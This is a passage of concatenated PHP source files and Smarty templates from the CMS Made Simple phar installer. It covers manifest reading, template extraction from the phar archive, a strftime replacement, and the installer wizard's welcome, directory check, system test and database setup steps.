        throw new \Exception(\__appbase\lang('error_internal','mr104'));
    }
  }
  
  protected function read()
  {
    if( !$this->_has_read ) {
      $fopen = $fclose = $fgets = $feof = null;
      if( $this->_compressed ) {
        $fopen = 'gzopen';
        $fclose = 'gzclose';
        $fgets = 'gzgets';
        $feof = 'gzeof';
      }
      else {
        $fopen = 'fopen';
        $fclose = 'fclose';
        $fgets = 'fgets';
        $feof = 'feof';
      }
      
      // copy the manifest file to a temporary location
      $tmpdir = \__appbase\get_app()->get_tmpdir();
      $tmpname = \tempnam($tmpdir, 'man');
      @\copy($this->_filename, $tmpname);
      $fh = $fopen($tmpname,'r');
      if( !$fh )  {
        throw new \RuntimeException(\__appbase\lang('error_internal', 'mr102'));
      }
      while( !$feof($fh) ) {
        $line = $fgets($fh);
        $line = \trim($line);
        $this->handle_line($line);
      }
      $fclose($fh);
      $this->_has_read = true;
    }
  }
  
  public function get_generated()
  {
    $this->read();
    return $this->_generated;
  }
  
  public function to_version()
  {
    $this->read();
    return $this->_to_version;
  }
  
  public function to_name()
  {
    $this->read();
    return $this->_to_name;
  }
  
  public function from_version()
  {
    $this->read();
    return $this->_from_version;
  }
  
  public function from_name()
  {
    $this->read();
    return $this->_from_name;
  }
  
  public function get_added()
  {
    $this->read();
    return $this->_added;
  }
  
  public function get_changed()
  {
    $this->read();
    return $this->_changed;
  }
  
  public function get_deleted()
  {
    $this->read();
    return $this->_deleted;
  }
  
} // end of class
?>
<?php
/**
 * Class for phar resource
 * currently only used for debugging purposes
 * @package cms_autoinstaller
 */

namespace cms_autoinstaller;

use __appbase\app;
use __appbase\cms_smarty;
use Phar;
use PharException;
use Smarty_Resource_Custom;
use function __appbase\get_app;

class smarty_phar_resource  extends Smarty_Resource_Custom
{
  
  /**
   * Fetch a template and its modification time from database
   *
   * @param string  $name   template name
   * @param string  $source template source
   * @param integer $mtime  template modification timestamp (epoch)
   *
   * @return void
   * @throws \Exception
   */
  protected function fetch($name, &$source, &$mtime)
  {
    $OS = \PHP_OS;
    
    // Path to the Phar archive
    $pharPath = Phar::running();
    
    
    if('WINNT' === $OS || 'WIN32' === $OS)
    {
      # we are on windows
      // Create a temporary directory for extraction
      $tempDir = \sys_get_temp_dir() . '/phar_extraction_' . \uniqid('', FALSE);
      
      if(!\mkdir($tempDir) && !\is_dir($tempDir))
      {
        throw new \RuntimeException(\sprintf('Directory "%s" was not created', $tempDir));
      }
      
      $phar = new Phar($pharPath);
      
      try
      {
        // Extract files from the Phar archive to the temporary directory
        $phar->extractTo($tempDir, 'app/templates/'. $name, TRUE);
        #$phar->extractTo($tempDir);
      }
      catch (PharException $e)
      {
        // Handle any exceptions that occur during extraction
        echo 'Error extracting files: ' . $e->getMessage();
      }
      
      // Check if the extracted files exist
      $tplFile = $tempDir . '/app/templates/' . $name;
      
      if(\file_exists($tplFile))
      {
        $files[] = $tplFile;
      }
      else
      {
        // The file could not be extracted
        echo "Failed to extract template file: $tplFile";
      }
      
      foreach( $files as $one )
      {
        if( \file_exists($one) )
        {
          $source = @\file_get_contents($one);
          $mtime = @\filemtime($one);
          return;
        }
      }
    }
    else
    {
      # we are on linux
      $source = cms_smarty::get_instance()->fetch($name);
    }
    
    // Clean up: Remove the temporary directory
//    if (\is_dir($tempDir)) {
//      // Recursively remove the temporary directory and its contents
//      $files = new \RecursiveIteratorIterator(
//        new \RecursiveDirectoryIterator($tempDir, \RecursiveDirectoryIterator::SKIP_DOTS),
//        \RecursiveIteratorIterator::CHILD_FIRST
//      );
//      foreach ($files as $file) {
//        if ($file->isDir()) {
//          \rmdir($file->getRealPath());
//        } else {
//          \unlink($file->getRealPath());
//        }
//      }
//      \rmdir($tempDir);
//    }
  
  }
}

?><?php

namespace cms_autoinstaller;

final class utils
{
  private function __construct() {}
  
  // get the list of versions we can upgrade from.
  public static function get_upgrade_versions()
  {
    $app                 = \__appbase\get_app();
    $app_config          = $app->get_config();
    
    $min_upgrade_version = $app_config['min_upgrade_version'];
    
    if(!$min_upgrade_version)
    {
      throw new \Exception(\__appbase\lang('error_invalidconfig'));
    }
    
    $dir = $app->get_appdir() . '/upgrade';
    if(!\is_dir($dir))
    {
      throw new \Exception(\__appbase\lang('error_internal', 'u100'));
    }
    
    $dh       = \opendir($dir);
    $versions = [];
    if(!$dh)
    {
      throw new \Exception(\__appbase\lang('error_internal', 712));
    }
    while(($file = \readdir($dh)) !== FALSE)
    {
      if($file == '.' || $file == '..')
      {
        continue;
      }
      if(
        \is_dir($dir . '/' . $file) &&
        (\is_file("$dir/$file/MANIFEST.DAT.gz") || \is_file("$dir/$file/MANIFEST.DAT") ||
         \is_file("$dir/$file/upgrade.php"))
      )
      {
        if(\version_compare($min_upgrade_version, $file) <= 0)
        {
          $versions[] = $file;
        }
      }
    }
    \closedir($dh);
    if(\count($versions))
    {
      \usort($versions, 'version_compare');
      
      return $versions;
    }
  }
  
  public static function get_upgrade_changelog($version)
  {
    // it is not an error to not have a changelog file
    $app = \__appbase\get_app();
    $dir = $app->get_appdir() . "/upgrade/$version";
    
    if(!\is_dir($dir))
    {
      throw new \Exception(\__appbase\lang('error_internal', 'u100'));
    }
    
    $files = ['CHANGELOG.txt', 'CHANGELOG.TXT', 'changelog.txt'];
    
    foreach($files as $fn)
    {
      if(\is_file("$dir/$fn"))
      {
        // convert text into some sort of html
        $tmp = @\file_get_contents("$dir/$fn");
        $tmp = \nl2br(\wordwrap(\htmlspecialchars($tmp), 80));
        
        return $tmp;
      }
    }
  }
  
  public static function get_upgrade_readme($version)
  {
    // it is not an error to not have a readme file
    $app = \__appbase\get_app();
    $dir = $app->get_appdir()."/upgrade/$version";
    if( !\is_dir($dir) ) throw new \RuntimeException(\__appbase\lang('error_internal', 'u100'));
    $files = ['README.HTML.INC', 'readme.html.inc', 'README.HTML', 'readme.html'];
    foreach( $files as $fn ) {
      if( \is_file("$dir/$fn") ) return @\file_get_contents("$dir/$fn");
    }
    if( \is_file("$dir/readme.txt") ) {
      // convert text into some sort of html.
      $tmp = @\file_get_contents("$dir/readme.txt");
      $tmp = \nl2br(\wordwrap(\htmlspecialchars($tmp), 80));
      return $tmp;
    }
  }
  
  public static function strftime(string $format, $timestamp = null, ?string $locale = null): string
  {
    if (null === $timestamp) {
      $timestamp = new \DateTime;
    }
    elseif (\is_numeric($timestamp)) {
      $timestamp = \date_create('@' . $timestamp);
      
      if ($timestamp) {
        $timestamp->setTimezone(new \DateTimezone(\date_default_timezone_get()));
      }
    }
    elseif (\is_string($timestamp)) {
      $timestamp = \date_create($timestamp);
    }
    
    if (!($timestamp instanceof \DateTimeInterface)) {
      throw new \InvalidArgumentException('$timestamp argument is neither a valid UNIX timestamp, a valid date-time string or a DateTime object.');
    }
    
    $locale = \substr((string) $locale, 0, 5);
    
    $intl_formats = [
      '%a' => 'EEE',	// An abbreviated textual representation of the day	Sun through Sat
      '%A' => 'EEEE',	// A full textual representation of the day	Sunday through Saturday
      '%b' => 'MMM',	// Abbreviated month name, based on the locale	Jan through Dec
      '%B' => 'MMMM',	// Full month name, based on the locale	January through December
      '%h' => 'MMM',	// Abbreviated month name, based on the locale (an alias of %b)	Jan through Dec
    ];
    
    $intl_formatter = function (\DateTimeInterface $timestamp, string $format) use ($intl_formats, $locale) {
      $tz = $timestamp->getTimezone();
      $date_type = \IntlDateFormatter::FULL;
      $time_type = \IntlDateFormatter::FULL;
      $pattern = '';
      
      // %c = Preferred date and time stamp based on locale
      // Example: Tue Feb 5 00:45:10 2009 for February 5, 2009 at 12:45:10 AM
      if ($format == '%c') {
        $date_type = \IntlDateFormatter::LONG;
        $time_type = \IntlDateFormatter::SHORT;
      }
      // %x = Preferred date representation based on locale, without the time
      // Example: 02/05/09 for February 5, 2009
      elseif ($format == '%x') {
        $date_type = \IntlDateFormatter::SHORT;
        $time_type = \IntlDateFormatter::NONE;
      }
      // Localized time format
      elseif ($format == '%X') {
        $date_type = \IntlDateFormatter::NONE;
        $time_type = \IntlDateFormatter::MEDIUM;
      }
      else {
        $pattern = $intl_formats[$format];
      }
      
      return (new \IntlDateFormatter($locale, $date_type, $time_type, $tz, null, $pattern))->format($timestamp);
    };
    
    // Same order as https://www.php.net/manual/en/function.strftime.php
    $translation_table = [
      // Day
      '%a' => $intl_formatter,
      '%A' => $intl_formatter,
      '%d' => 'd',
      '%e' => function ($timestamp) {
        return \sprintf('% 2u', $timestamp->format('j'));
      },
      '%j' => function ($timestamp) {
        // Day number in year, 001 to 366
        return \sprintf('%03d', $timestamp->format('z') + 1);
      },
      '%u' => 'N',
      '%w' => 'w',
      
      // Week
      '%U' => function ($timestamp) {
        // Number of weeks between date and first Sunday of year
        $day = new \DateTime(\sprintf('%d-01 Sunday', $timestamp->format('Y')));
        return \sprintf('%02u', 1 + ($timestamp->format('z') - $day->format('z')) / 7);
      },
      '%V' => 'W',
      '%W' => function ($timestamp) {
        // Number of weeks between date and first Monday of year
        $day = new \DateTime(\sprintf('%d-01 Monday', $timestamp->format('Y')));
        return \sprintf('%02u', 1 + ($timestamp->format('z') - $day->format('z')) / 7);
      },
      
      // Month
      '%b' => $intl_formatter,
      '%B' => $intl_formatter,
      '%h' => $intl_formatter,
      '%m' => 'm',
      
      // Year
      '%C' => function ($timestamp) {
        // Century (-1): 19 for 20th century
        return \floor($timestamp->format('Y') / 100);
      },
      '%g' => function ($timestamp) {
        return \substr($timestamp->format('o'), -2);
      },
      '%G' => 'o',
      '%y' => 'y',
      '%Y' => 'Y',
      
      // Time
      '%H' => 'H',
      '%k' => function ($timestamp) {
        return \sprintf('% 2u', $timestamp->format('G'));
      },
      '%I' => 'h',
      '%l' => function ($timestamp) {
        return \sprintf('% 2u', $timestamp->format('g'));
      },
      '%M' => 'i',
      '%p' => 'A', // AM PM (this is reversed on purpose!)
      '%P' => 'a', // am pm
      '%r' => 'h:i:s A', // %I:%M:%S %p
      '%R' => 'H:i', // %H:%M
      '%S' => 's',
      '%T' => 'H:i:s', // %H:%M:%S
      '%X' => $intl_formatter, // Preferred time representation based on locale, without the date
      
      // Timezone
      '%z' => 'O',
      '%Z' => 'T',
      
      // Time and Date Stamps
      '%c' => $intl_formatter,
      '%D' => 'm/d/Y',
      '%F' => 'Y-m-d',
      '%s' => 'U',
      '%x' => $intl_formatter,
    ];
    
    $out = \preg_replace_callback('/(?<!%)(%[a-zA-Z])/', static function ($match) use ($translation_table, $timestamp) {
      if ($match[1] == '%n') {
        return "\n";
      }
      elseif ($match[1] == '%t') {
        return "\t";
      }
      
      if (!isset($translation_table[$match[1]])) {
        throw new \InvalidArgumentException(\sprintf('Format "%s" is unknown in time format', $match[1]));
      }
      
      $replace = $translation_table[$match[1]];
      
      if (\is_string($replace)) {
        return $timestamp->format($replace);
      }
      else {
        return $replace($timestamp, $match[1]);
      }
    },                            $format);
    
    $out = \str_replace('%%', '%', $out);
    return $out;
  }
} // end of class

?>
<?php

namespace cms_autoinstaller;

abstract class wizard_step extends \__appbase\wizard_step
{
  static $_registered;
  
  /**
   * @throws \SmartyException
   */
  public function __construct()
  {
    parent::__construct();
    $dd = \__appbase\get_app()->get_destdir();
    if( !$dd ) throw new \RuntimeException('Session Failure');

    if( !self::$_registered ) {
      \__appbase\smarty()->addPluginsDir(\__appbase\app::get_rootdir().'/lib/plugins');
      \__appbase\smarty()->registerPlugin('function', 'wizard_form_start', [$this, 'fn_wizard_form_start']);
      \__appbase\smarty()->registerPlugin('function', 'wizard_form_end', [$this, 'fn_wizard_form_end']);
      self::$_registered = 1;
    }

    \__appbase\smarty()->assign('version',\__appbase\get_app()->get_dest_version());
    \__appbase\smarty()->assign('version_name',\__appbase\get_app()->get_dest_name());
    \__appbase\smarty()->assign('dir',\__appbase\get_app()->get_destdir());
    \__appbase\smarty()->assign('in_phar',\__appbase\get_app()->in_phar());
    \__appbase\smarty()->assign('cur_step',$this->cur_step());
  }

  public function fn_wizard_form_start($params, $smarty)
  {
      echo '<form method="POST" action="'.$_SERVER['REQUEST_URI'].'">';
  }

  public function fn_wizard_form_end($params, $smarty)
  {
      echo '</form>';
  }
  
  /**
   * @throws \Exception
   */
  protected function get_primary_title()
  {
      $app = \__appbase\get_app();
      $action = $this->get_wizard()->get_data('action');
      $str = null;
      switch( $action ) {
      case 'upgrade':
          $str = \__appbase\lang('action_upgrade',$app->get_dest_version());
          break;
      case 'freshen':
          $str = \__appbase\lang('action_freshen',$app->get_dest_version());
          break;
      case 'install':
      default:
          $str = \__appbase\lang('action_install',$app->get_dest_version());
      }
      return $str;
  }
  
  /**
   * @throws \Exception
   */
  protected function display()
  {
      \__appbase\smarty()->assign('wizard_steps',$this->get_wizard()->get_nav());
      \__appbase\smarty()->assign('title',$this->get_primary_title());
  }

  public function error($msg)
  {
      $msg = \addslashes($msg);
      echo '<script type="text/javascript">add_error(\''.$msg.'\');</script>'."\n";
      \flush();
  }

  public static function verbose($msg)
  {
      $msg = \addslashes($msg);
      $verbose = \__appbase\wizard::get_instance()->get_data('verbose');
      if( $verbose )  echo '<script type="text/javascript">add_verbose(\''.$msg.'\');</script>'."\n";
      \flush();
  }

  public function message($msg)
  {
      $msg = \addslashes($msg);
      echo '<script type="text/javascript">add_message(\''.$msg.'\');</script>'."\n";
      \flush();
  }

  public function set_block_html($id, $html)
  {
      $html = \addslashes($html);
      echo '<script type="text/javascript">set_block_html(\''.$id.'\',\''.$html.'\');</script>'."\n";
      \flush();
  }

  protected function finish()
  {
      echo '<script type="text/javascript">finish();</script>'."\n";
      \flush();
  }

}

?>
<?php
Quick notes for debugging/developing the .phar installer

1:
--
For developing with the .phar installer without building the thing for each test
specify a ?dest=/full/path/to/directory argument on the INITIAL url

i.e:  http://www.mysite.com/phar_installer/index.php?dest=/var/www/cmsms_dir

{* error template *}

{extends file='index.tpl'}

{block name='logic'}
    {$title = 'title_error'|tr}
{/block}

{block name='contents'}{/block}
{block name='logic'}{/block}<!DOCTYPE html>
<!--[if IE 8]>         <html lang="en" class="lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
    <head>
        {if isset($BASE_HREF)}<base href="{$BASE_HREF}"/>{/if}
        <meta charset="utf-8">
        <meta name='HandheldFriendly' content='True' />
        <meta name='MobileOptimized' content='320' />
        <meta name='viewport' content='width=device-width, initial-scale=1.0' />
        <meta http-equiv='cleartype' content='on' />
        <script src="app/assets/vendor/jquery-1.11.2.min.js"></script>
        <script src="app/assets/vendor/jquery-ui/jquery-ui.min.js"></script>
        <link rel="stylesheet" type="text/css" href="app/assets/vendor/jquery-ui/jquery-ui.min.css"/>
        <title>
      {if !empty($browser_title)}
        {$browser_title}
      {elseif !empty($title)}
        {$title nocache} - CMS Made Simple&trade; {'apptitle'|tr}
      {else}
        CMS Made Simple&trade; {'apptitle'|tr}}
      {/if}
     </title>
        <!--[if lt IE 9]>
            <script src="app/assets/js/html5.js"></script>
            <script src="app/assets/js/css3-mediaqueries.js"></script>
        <![endif]-->
        <link rel="stylesheet" type="text/css" href="app/assets/css/install.css"/>
    <link rel="icon" type="image/ico" href="app/assets/images/favicon.ico"/>
    </head>
    <body class="cmsms-ui">
        <div class="row header-section">
            <a href="http://www.cmsmadesimple.org" rel="external" target="_blank" class="cmsms-logo" title="CMS Made Simple&trade;">
                <img src="app/assets/images/cmsms-logo.png" alt="CMS Made Simple&trade;" title="CMS Made Simple&trade;" width="332" height="77" />
            </a>
            <span class="installer-title">{'apptitle'|tr}</span>
        </div>
        <div class="row installer-section">
            <div class="four-col installer-steps-section">
                <div class="inner">
                {block name='aside_content'}
                    {if isset($wizard_steps)}
                    <aside class="installer-steps">
                        <ol id="installer-indicator">
                            {foreach $wizard_steps as $classname => $step}
                            {strip}
                            <li class="step {if $step.active} current-step{/if}{if isset($current_step) && $current_step > $step@iteration} done-step{/if}">
                                <h4 class="step-title">{$step.classname|tr}{if isset($current_step) && $current_step > $step@iteration} <i class="icon-checkmark">&#x2713;</i>{/if}</h4>
                                <p class="step-description"><em>{'desc_'|cat:$step.classname|tr}</em></p>
                            </li>
                            {/strip}
                            {/foreach}
                        </ol>
                    </aside>
                    {/if}
                {/block}
                </div>
            </div>
            <main role="main" class="eight-col installer-content-section">
                <div class="inner">
                    <h1>{if isset($title)}{$title}{else}{'install_upgrade'|tr}{/if}</h1>
            {if isset($subtitle)}<h3>{$subtitle}</h3>{/if}

                    {if isset($dir) && ($in_phar || $cur_step > 1)}
                    <div class="message blue icon">
                        <i class="icon-folder-open message-icon"></i>
                        <div class="content"><strong>{'prompt_dir'|tr}:</strong> <br />{$dir}</div>
                    </div>
                    {/if}

                    {if isset($error)}
                    <div class="message red">
                        {$error}
                    </div>
                    {/if}
                    <article>
                        {block name='contents'}WIZARD CONTENTS GO HERE{/block}
            {block name='content-footer'}{/block}
                    </article>

                </div>
            </main>
        </div>
        <footer class="row footer-section">
            <div class="footer-info">
                <a href="https://forum.cmsmadesimple.org" target="_blank">{'title_forum'|tr}</a> &bull; <a href="https://docs.cmsmadesimple.org" target="_blank">{'title_docs'|tr}</a> &bull; <a href="http://apidoc.cmsmadesimple.org" target="_blank">{'title_api_docs'|tr}</a>
            </div>
            <div>
                <small>
                &copy; Copyright {$smarty.now|localedate_format:'Y'} <a href="http://www.cmsmadesimple.org">CMS Made Simple&trade;</a>. All rights reserved{if isset($installer_version)} - {'installer_ver'|tr}:&nbsp;{$installer_version}{/if}{if isset($build_time)} - {'build_date'|tr}:&nbsp;{$build_time|localedate_format:'j %h Y H:i:s'}{/if}
                </small>
            </div>
            <div><small>{if isset($build_number)}{'build_reference'|tr}: {$build_number}{/if}</small> </div>
        </footer>
    {block name='javascript'}
    <script>
    var cmsms_lang = {
        freshen : '{'confirm_freshen'|tr|addslashes}',
        upgrade : '{'confirm_upgrade'|tr|addslashes}',
        message : '{'social_message'|tr|addslashes}'
    };
    </script>
    {/block}
    </body>
</html>
{extends file='index.tpl'}
{block name='javascript' append}
    <script src="app/assets/js/functions.js"></script>
{/block}{* wizard step 1 *}
{extends file='wizard_step.tpl'}

{block name='logic'}
    {capture assign='browser_title'}CMS Made Simple&trade; {$version|default:''} ({$version_name|default:''}) {'apptitle'|tr}{/capture}
    {capture assign='title'}{'title_welcome'|tr} {'to'|tr} CMS Made Simple&trade; {$version|default:''} <em>({$version_name|default:''})</em><br/>{'apptitle'|tr}{/capture}
    {$current_step = '1'}
{/block}

{block name='contents'}
<script type="text/javascript">
function redirect_langchange() {
  var e = document.getElementById('lang_selector');
  var v = e.options[e.selectedIndex].value;
  var url = window.location.origin + window.location.pathname + '?curlang='+v;
  window.location = url;
  return false;
}
</script>

<p>{'welcome_message'|tr}</p>

<div class="installer-form">
{wizard_form_start}
    {if empty($custom_destdir) && !empty($dirlist)}
      <h3>{'step1_destdir'|tr}</h3>

      <p class="message yellow">{'step1_info_destdir'|tr}</p>

      <div class="row message yellow">
        <label>{'destination_directory'|tr}:</label>
        <select class="form-field" name="destdir">
          {html_options options=$dirlist selected=$destdir|default:''}
        </select>
      </div>
      <hr />
    {/if}

    <h3>{'step1_language'|tr}</h3>
    <p class="info">{'select_language'|tr}</p>
    <div class="row">
        <label>{'available_languages'|tr}:</label>
        <select id="lang_selector" class="form-field" name="lang" onchange="redirect_langchange()">
            {html_options options=$languages selected=$curlang}
        </select>
    </div>

    <hr />

    <h3>{'step1_advanced'|tr}</h3>
    <p class="info">{'info_advanced'|tr}</p>

    <div class="row">
        <label>{'advanced_mode'|tr}:</label>
        <select class="form-field" name="verbose">
            {html_options options=$yesno selected=$verbose}
        </select>
    </div>

    <div id="bottom_nav">
      <input type="submit" class="action-button positive" name="next" value="{'next'|tr} &rarr;"/>
    </div>
{wizard_form_end}
</div>
{/block}
{* wizard step 2 *}

{extends file='wizard_step.tpl'}
{block name='logic'}
    {$title = 'title_step2'|tr}
    {$current_step = '2'}
{/block}
{block name='contents'}

<script type="text/javascript">
$(document).ready(function(){
  $('#upgrade_info .link').css('cursor','pointer').click(function(){
     var e = '#'+$(this).data('content');
     $(e).dialog({
       minWidth: 500,
       modal: 'true'
     })
  });
});
</script>

<div class="installer-form">
  {wizard_form_start}
  {$label='install'|tr}

  {if $nofiles}
    <div class="message yellow">{'step2_nofiles'|tr}</div>
  {/if}

  {if !isset($cmsms_info)}
    <div class="message yellow">{'step2_nocmsms'|tr}</div>
    {if !$install_empty_dir}
    <div class="message red">{'step2_install_dirnotempty2'|tr}
      {if !empty($existing_files)}
      <ul>
        {foreach $existing_files as $one}
        <li>{$one}</li>
        {/foreach}
      </ul>
      {/if}
    </div>
    {/if}
  {else}
    {* its an upgrade or freshen *}
    {if isset($cmsms_info.error_status)}
      {if $cmsms_info.error_status == 'too_old'}
        <div class="message red">{'step2_cmsmsfoundnoupgrade'|tr}</div>
      {elseif $cmsms_info.error_status == 'same_ver'}
        <div class="message red">{'step2_errorsamever'|tr}</div>
      {elseif $cmsms_info.error_status == 'too_new'}
        <div class="message red">{'step2_errortoonew'|tr}</div>
      {else}
        <div class="message red">{'step2_errorother'|tr}</div>
      {/if}
    {else}
      <div class="message yellow">{'step2_cmsmsfound'|tr}</div>
    {/if}

    <ul class="existing-info no-list no-padding">
      <li class="row"><div class="six-col">{'step2_pwd'|tr}:</div><div class="six-col"><span class="label blue"><i class="icon-folder-open"></i> {$pwd}</span></div></li>
      <li class="row"><div class="six-col">{'step2_version'|tr}:</div><div class="six-col"><span class="label blue"><i class="icon-info"></i> {$cmsms_info.version} <em>({$cmsms_info.version_name})</em></span></div></li>
      <li class="row"><div class="six-col">{'step2_schemaver'|tr}:</div><div class="six-col"><span class="label blue"><i class="icon-stack"></i> {$cmsms_info.schema_version}</span></div></li>
      <li class="row"><div class="six-col">{'step2_installdate'|tr}:</div><div class="six-col"><span class="label blue"><i class="icon-calendar"></i> {$cmsms_info.mtime|localedate_format:'j %h Y'}</span></div></li>
    </ul>

    {if isset($cmsms_info.noupgrade)}
      <div class="message yellow">{'step2_minupgradever'|tr:$config.min_upgrade_version}</div>
    {else}
      {$label='upgrade'|tr}
      {if !empty($upgrade_info)}
        <div class="message blue icon">
          <i class="icon-info message-icon"></i>
          <div class="content"><strong>{'step2_hdr_upgradeinfo'|tr}</strong><br />{'step2_info_upgradeinfo'|tr}</div>
        </div>
        <ul id="upgrade_info" class="no-list">
          {foreach $upgrade_info as $ver => $data}
          <li class="upgrade-ver row">
            <div class="four-col">{$ver}</div>
            <div class="four-col">
              {if $data.readme}
              <div class="label green link" data-content="r{$data@iteration}"><i class="icon-info"></i> {'readme_uc'|tr}</div>
              {/if}
            </div>
            <div class="four-col">
              {if $data.changelog}
              <div class="label blue link" data-content="c{$data@iteration}"><i class="icon-info"></i> {'changelog_uc'|tr}</div>
              {/if}
            </div>
          </li>
          {/foreach}
        </ul>
      {/if}
    {/if}
    {if isset($cmsms_info.error_status) && $cmsms_info.error_status == 'same_ver'}
    <div class="message yellow">{'step2_info_freshen'|tr:$cmsms_info.config.db_prefix}</div>
    {/if}
  {/if}

  <div id="bottom_nav">
    {if !isset($cmsms_info)}
      {if isset($retry_url)}
      {* <a class="action-button orange" href="{$retry_url}" title="{'retry'|tr}">{'retry'|tr} <i class="icon-loop"></i></a> *}
      <a onClick="window.location.reload();" class="action-button orange" title="{'retry'|tr}">{'retry'|tr} <i class="icon-loop"></i></a>
      {/if}
      <input class="action-button positive" id="install" type="submit" name="install" value="{'install'|tr}" />
    {elseif !isset($cmsms_info.error_status)}
      <input class="action-button positive" id="upgrade" type="submit" name="upgrade" value="{'upgrade'|tr} &rarr;" />
    {elseif $cmsms_info.error_status == 'same_ver'}
      <input class="action-button positive" id="freshen" type="submit" name="freshen" value="{'freshen'|tr} &rarr;" />
    {/if}
  </div>

  {wizard_form_end}
</div>

<div class="hidden">
  {if isset($upgrade_info)}
    {foreach $upgrade_info as $ver => $data}
      {if $data.readme}
      <div id="r{$data@iteration}" title="{'readme_uc'|tr}: {$ver}">
        <div class="bigtext">{$data.readme}</div>
      </div>
      {/if}
      {if $data.changelog}
        <div id="c{$data@iteration}" title="{'changelog_uc'|tr}: {$ver}">
          <div class="bigtext">{$data.changelog}</div>
        </div>
      {/if}
    {/foreach}
  {/if}
</div>
{/block}
{* wizard step 3 *}

{extends file='wizard_step.tpl'}
{block name='logic'}
    {$subtitle = 'title_step3'|tr}
    {$current_step = '3'}
{/block}

{block name='contents'}

{if $tests_failed}
  {if !$can_continue}
    <div class="message red">{'step3_failed'|tr}</div>
  {else}
    <div class="message yellow">{'sometests_failed'|tr}</div>
  {/if}
{/if}

{if $tests_failed || $verbose}
  <table class="table zebra-table bordered-table installer-test-information">
    <thead class="tbhead">
        <tr>
            <th>{'th_status'|tr}</th>
            <th>{'th_testname'|tr}</th>
        </tr>
    </thead>
    <tbody>
    {foreach from=$tests item='test'}
        {cycle values='odd,even' assign='rowclass'}
        <tr class="{$rowclass}{if $test->status == 'test_fail'} error{/if}{if $test->status == 'test_warn'} warning{/if}">
            <td class="{$test->status}">{if $test->status == 'test_fail'}<i title="{'test_failed'|tr}" class="icon-cancel-circle red"></i>{elseif $test->status == 'test_warn'}<i title="{'test_warning'|tr}" class="icon-warning yellow"></i>{else}<i title="{'test_passed'|tr|strip_tags}" class="icon-checkmark-circle green"></i>{/if}</td>
            <td>
                {$test->name|tr}
                {$str = $test->msg()}
                {if $str != '' && ($verbose || $test->status != 'test_pass')}
                  <br />
                  <span class="tests-infotext">{$str}</span>
                {/if}
            </td>
        </tr>
    {/foreach}
    </tbody>
  </table>
{else}
  <div class="message green">{'step3_passed'|tr}</div>
{/if}

<table class="table bordered-table installer-test-legend small-font">
    <caption>
        {'legend'|tr}
    </caption>
    <thead>
        <tr>
            <th>{'symbol'|tr}</th>
            <th>{'meaning'|tr}</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td class="test_fail red"><i title="{'test_failed'|tr}" class="icon-cancel-circle red"></td>
            <td>{'test_failed'|tr}</td>
        </tr>
        <tr>
            <td class="test_pass green"><i title="{'test_passed'|tr|strip_tags}" class="icon-checkmark-circle green"></i></td>
            <td>{'test_passed'|tr}</td>
        </tr>
        <tr>
            <td class="test_warn yellow"><i title="{'test_warning'|tr}" class="icon-warning yellow"></i></td>
            <td>{'test_warning'|tr}</td>
        </tr>
    </tbody>
</table>

<div class="message yellow">{'warn_tests'|tr}</div>

<div id="bottom_nav">
{if $tests_failed}
  <a onClick="window.location.reload();" class="action-button orange" title="{'retry'|tr}">{'retry'|tr} <i class="icon-loop"></i></a>
{/if}
{if $can_continue} <a href="{$next_url}" class="action-button positive" title="{'next'|tr}">{'next'|tr} &rarr;</a>{/if}
</div>

{/block}
{* wizard step 4 *}

{extends file='wizard_step.tpl'}
{block name='logic'}
    {$subtitle = 'title_step4'|tr}
    {$current_step = '4'}
{/block}

{block name='contents'}

<div class="installer-form">
{wizard_form_start}

    <h3>{'prompt_dbinfo'|tr}</h3>
    <p>{'info_dbinfo'|tr}</p>

    <fieldset>
        {if $verbose}
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbtype'|tr}</label>
            </div>
            <div class="eight-col">
                <select class="form-field" name="dbtype">
                    {html_options options=$dbtypes selected=$config.dbtype}
                </select>
            </div>
        </div>
        {/if}
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbhost'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="text" name="dbhost" value="{$config.dbhost}" required="required" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbname'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="text" name="dbname" value="{$config.dbname}" required="required" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbuser'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="text" name="dbuser" value="{$config.dbuser}" required="required" autocomplete="off"/>
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbpass'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="password" name="dbpass" value="" autocomplete="false" required="required"/>
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        {if $verbose}
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbport'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field full-width" type="text" name="dbport" value="{$config.dbport}" />
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'prompt_dbprefix'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field full-width" type="text" name="dbprefix" value="{$config.dbprefix}" />
            </div>
        </div>
        {/if}
    </fieldset>

    <h3>{'prompt_timezone'|tr}</h3>
    <p>{'info_timezone'|tr}</p>

    <div class="row form-row">
        <label class="visuallyhidden">{'prompt_timezone'|tr}</label>
        <select class="form-field" name="timezone">
            {html_options options=$timezones selected=$config.timezone}
        </select>
    </div>

    {if $verbose}

    <h3>{'prompt_queryvar'|tr}</h3>
    <p class="info">{'info_queryvar'|tr}</p>

    <div class="row form-row">
        <div class="four-col">
            <label>{'prompt_queryvar'|tr}</label>
        </div>
        <div class="eight-col">
            <input class="form-field" type="text" name="query_var" value="{$config.query_var}" />
        </div>
    </div>
    {/if}

    {if $verbose and $action == 'install'}

    <h3>{'prompt_optional_modules'|tr}</h3>
    <p class="info">{'info_optional_modules'|tr}</p>
    <fieldset>
        {html_checkboxes name='optional_modules' options = $optional_modules
        selected = $config.optional_modules  separator='<br>'}
    </fieldset>
    <h3>{'prompt_installcontent'|tr}</h3>
